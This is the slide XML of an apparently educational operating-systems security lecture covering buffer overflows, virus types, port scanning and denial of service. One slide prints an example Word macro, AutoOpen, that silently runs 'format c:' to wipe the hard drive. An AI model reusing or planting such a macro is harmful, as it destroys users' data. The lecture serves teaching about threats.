          <p:cNvPr id="277" name="Google Shape;277;g2ea5eb945af_0_70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="4038000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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For the first step of determining the bug, and second step of writing exploit code, yes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Script kiddies can run pre-written exploit code to attack a given  system</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Attack code can get a shell with the processes’ owner’s permissions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Or open a network port, delete files, download a program, etc.</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Depending on bug, attack can be executed across a network using  allowed connections, bypassing firewalls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Buffer overflow can be disabled by disabling stack execution or adding  bit to page table to indicate “non-executable” state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Available in SPARC and x86</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>But still have security exploits</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweath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ea5eb945af_0_8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37</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;g2ea5eb945af_0_8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g2ea5eb945af_0_8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g2ea5eb945af_0_8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 </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;g2ea5eb945af_0_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="651638"/>
            <a:ext cx="7591200" cy="48333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Viruses</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Code fragment embedded in legitimate program</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Self-replicating, designed to infect other computers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Very specific to CPU architecture, operating system, applications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Usually borne via email or as a macro</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Visual Basic Macro to reformat hard drive</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Sub AutoOpen()</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Dim oFS</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1092200" marR="12700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Set oFS = CreateObject(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="MS PGothic"/>
                <a:ea typeface="MS PGothic"/>
                <a:cs typeface="MS PGothic"/>
                <a:sym typeface="MS PGothic"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="MS PGothic"/>
                <a:ea typeface="MS PGothic"/>
                <a:cs typeface="MS PGothic"/>
                <a:sym typeface="MS PGothic"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)  vs = Shell(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="MS PGothic"/>
                <a:ea typeface="MS PGothic"/>
                <a:cs typeface="MS PGothic"/>
                <a:sym typeface="MS PGothic"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>c:command.com /k format c:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="MS PGothic"/>
                <a:ea typeface="MS PGothic"/>
                <a:cs typeface="MS PGothic"/>
                <a:sym typeface="MS PGothic"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,vbHide)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>End Sub</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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ea5eb945af_0_9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38</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;g2ea5eb945af_0_9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2ea5eb945af_0_9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2ea5eb945af_0_9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Program Threats </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;g2ea5eb945af_0_90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="752063"/>
            <a:ext cx="7591200" cy="45510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Virus dropper inserts virus onto the system</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Many categories of viruses, literally many thousands of viruses</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File / parasitic</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Boot / memory</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Macro</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Source code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Polymorphic to avoid having a virus signature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Encrypted</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Stealth</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Tunneling</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Multipartite</a:t>
            </a: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ea5eb945af_0_100"/>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39</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;g2ea5eb945af_0_100"/>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2ea5eb945af_0_100"/>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2ea5eb945af_0_100"/>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A Boot-sector Computer Virus</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="304" name="Google Shape;304;g2ea5eb945af_0_100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794375" y="835800"/>
            <a:ext cx="3766199" cy="399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a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p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8"/>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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="804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Set auto login to avoid typing in passwords endlessly</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="954988"/>
            <a:ext cx="7591200" cy="38994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Want to dodge the lock screen login in Windows 10? There is one easy way to do this – first of all, you’ll need to bring up the Run command box.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To do so, click on the Cortana/search box (next to the Start menu) and simply type in the following:</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>netplwiz</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You’ll see a User Accounts window appear, and here, you need to select the account that will automatically login. Type in the credentials for this account and hit OK.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A new window, called Automatically Sign-in, will subsequently appear. Type your password again and hit OK. Go to Sign-in options, select 'Never' under the ‘Require Sign-in’ box, then hit OK one final time.</a:t>
            </a:r>
            <a:endParaRPr sz="16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g2ea5eb945af_0_167"/>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40</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;g2ea5eb945af_0_167"/>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g2ea5eb945af_0_167"/>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2ea5eb945af_0_167"/>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The Threat Continues</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;g2ea5eb945af_0_167"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="1019163"/>
            <a:ext cx="7591200" cy="44124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Attacks still common, still occurring</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Attacks moved over time from science experiments to tools of</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organized crime</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Targeting specific companies</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Creating botnets to use as tool for spam and DDOS delivery</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Keystroke logger to grab passwords, credit card numbers</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Why is Windows the target for most attacks?</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Most common</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Everyone is an administrator</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Licensing required?</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Monoculture considered harmful</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g2ea5eb945af_0_17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41</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;g2ea5eb945af_0_17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2ea5eb945af_0_175"/>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2ea5eb945af_0_175"/>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System and Network Threats</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Google Shape;322;g2ea5eb945af_0_175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="968338"/>
            <a:ext cx="7591200" cy="37815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a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Some systems “open” rather than secure by default</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Reduce attack surface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But harder to use, more knowledge needed to administer</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Network threats harder to detect, prevent</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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Protection systems weaker</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More difficult to have a shared secret on which to base access</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No physical limits once system attached to internet</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Or on network with system attached to internet</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Even determining location of connecting system difficult</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IP address is only knowledge</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2ea5eb945af_0_18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42</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;g2ea5eb945af_0_18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g2ea5eb945af_0_183"/>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g2ea5eb945af_0_183"/>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System and Network Threats </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Google Shape;331;g2ea5eb945af_0_183"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="752063"/>
            <a:ext cx="7591200" cy="35247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Port scanning</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Automated attempt to connect to a range of ports on one or a  range of IP addresses</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Detection of answering service protocol</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Detection of OS and version running on system</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nmap scans all ports in a given IP range for a response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nessus has a database of protocols and bugs (and exploits) to  apply against a system</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Frequently launched from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t> zombie systems</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1">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To decrease trace-ability</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eca6215655_0_307"/>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43</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;g2eca6215655_0_307"/>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2eca6215655_0_307"/>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2eca6215655_0_307"/>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System and Network Threats </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;g2eca6215655_0_307"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="752063"/>
            <a:ext cx="7591200" cy="43920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Denial of Service</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Overload the targeted computer preventing it from doing any useful  work</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Distributed Denial-of-Service (DDoS) come from multiple sites at  once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Consider the start of the IP-connection handshake (SYN)</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How many started-connections can the OS handle?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Consider traffic to a web site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How can you tell the difference between being a target and</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being really popular?</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Accidental – CS students writing bad fork() code</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Purposeful – extortion, punishment</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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ea5eb945af_0_191"/>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44</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;g2ea5eb945af_0_191"/>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2ea5eb945af_0_191"/>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ea5eb945af_0_191"/>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System and Network Threats </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;g2ea5eb945af_0_191"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="752063"/>
            <a:ext cx="7591200" cy="1800900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Port scanning</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Automated tool to look for network ports accepting connections</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Used for good and evil</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600">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g2ea5eb945af_0_199"/>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45</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;g2ea5eb945af_0_199"/>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2ea5eb945af_0_199"/>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2ea5eb945af_0_199"/>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a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Standard Security Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358" name="Google Shape;358;g2ea5eb945af_0_199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589138" y="752075"/>
            <a:ext cx="3965724" cy="44204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ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097900" y="1111225"/>
            <a:ext cx="52305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4300" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab"/>
                <a:ea typeface="Roboto Slab"/>
                <a:cs typeface="Roboto Slab"/>
                <a:sym typeface="Roboto Slab"/>
              </a:rPr>
              <a:t>Let’s do some exercises!</a:t>
            </a:r>
            <a:endParaRPr sz="4300" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Roboto Slab"/>
              <a:ea typeface="Roboto Slab"/>
              <a:cs typeface="Roboto Slab"/>
              <a:sym typeface="Roboto Slab"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p25"/>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46</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
